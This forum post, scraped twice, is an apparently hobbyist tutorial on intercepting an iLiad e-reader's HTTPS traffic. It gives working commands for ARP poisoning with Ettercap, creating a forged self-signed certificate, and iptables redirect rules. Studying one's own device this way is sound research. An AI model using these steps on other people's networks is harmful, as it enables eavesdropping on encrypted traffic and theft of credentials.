MobileRead Forums - View Single Post

TadW · 08-09-2006, 05:04 AM

SSL MITM Attack of iLiad reader

Requirement: OpenSSL libraries to support SSL and TLS

To sniff a HTTPS connection with Ettercap, we must set up two separate SSL tunnels. Essentially we first ARP poison the iLiad and the gateway (as described earlier), then intercept the iLiad's SSL request, and present it with our own certificate. When the iLiad accepts the certificate, ettercap establishes an SSL tunnel from the device to itself, masquerading as the iDS server. It then establishes a second SSL tunnel to the real web server, with itself as the SSL client.

We have to create our SSL certificate (if your installation of Ettercap didn't do it already for you):

Code:

openssl genrsa -out etter.ssl.crt 1024 
openssl req -new -key etter.ssl.crt -out tmp.csr
openssl x509 -req -days 1825 -in tmp.csr -signkey etter.ssl.crt -out tmp.new
cat tmp.new >> etter.ssl.crt
rm -f tmp.new tmp.csr 
cp etter.ssl.crt /usr/local/share/ettercap (path can differ depending on your installation of ettercap)

Edit /etc/etter.conf, and do the following important changes:

ec_uid=0 (otherwise Ettercap cannot access your iptables rules needed to establish the forwarding)

further down the config file, uncomment the firewall rules that apply to your sniffing host. For instance, if you run Linux with iptables (most likely), uncomment as in the following example:

Code:

#---------------
#     Linux
#---------------         

# if you use ipchains:
   #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
   #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

iptables –N nat (to make the iptables table nat)
start sniffing as explained before:
- ettercap -Tq -L /tmp/logfile.log -M arp:remote /192.168.0.1/ /192.168.0.10/ (here: router = 192.168.0.1, iLiad = 192.168.0.10)

08-09-2006, 05:04 AM	#6
TadW Uebermensch Posts: 2,583 Karma: 1094606 Join Date: Jul 2003 Location: Italy Device: Kindle	SSL MITM Attack of iLiad reader Requirement: OpenSSL libraries to support SSL and TLS To sniff a HTTPS connection with Ettercap, we must set up two separate SSL tunnels. Essentially we first ARP poison the iLiad and the gateway (as described earlier), then intercept the iLiad's SSL request, and present it with our own certificate. When the iLiad accepts the certificate, ettercap establishes an SSL tunnel from the device to itself, masquerading as the iDS server. It then establishes a second SSL tunnel to the real web server, with itself as the SSL client. We have to create our SSL certificate (if your installation of Ettercap didn't do it already for you): Code: openssl genrsa -out etter.ssl.crt 1024 openssl req -new -key etter.ssl.crt -out tmp.csr openssl x509 -req -days 1825 -in tmp.csr -signkey etter.ssl.crt -out tmp.new cat tmp.new >> etter.ssl.crt rm -f tmp.new tmp.csr cp etter.ssl.crt /usr/local/share/ettercap (path can differ depending on your installation of ettercap) Edit /etc/etter.conf, and do the following important changes: ec_uid=0 (otherwise Ettercap cannot access your iptables rules needed to establish the forwarding) further down the config file, uncomment the firewall rules that apply to your sniffing host. For instance, if you run Linux with iptables (most likely), uncomment as in the following example: Code: #--------------- # Linux #--------------- # if you use ipchains: #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport" #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport" # if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" iptables –N nat (to make the iptables table nat) start sniffing as explained before: ettercap -Tq -L /tmp/logfile.log -M arp:remote /192.168.0.1/ /192.168.0.10/ (here: router = 192.168.0.1, iLiad = 192.168.0.10)